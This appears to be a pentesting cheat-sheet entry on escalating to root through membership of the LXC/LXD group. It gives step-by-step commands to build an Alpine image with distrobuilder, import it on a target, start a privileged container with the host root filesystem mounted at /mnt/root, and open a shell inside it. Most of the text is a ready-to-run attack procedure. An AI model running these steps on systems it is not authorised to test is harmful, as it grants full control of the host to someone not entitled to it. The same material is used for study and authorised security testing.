LXC membership

On the attacker machine, install distro builder projet:

#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
git clone https://github.com/lxc/distrobuilder
#Make distrobuilder
cd distrobuilder
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

lxd.tar.xz and rootfs.squashfs are built. Upload them on the vulnerable machine.

From the vulnerable machine, add the Alpine image as follows:

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image

Then, create a container from this imported LXC image and add root path:

lxc init alpine privesc -c security.privileged=true --alias=alpine
lxc list #List containers

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

Finally, run the container:

lxc start privesc
lxc exec privesc /bin/sh

Host filesystem can be accessed from /mnt/root.

Last updated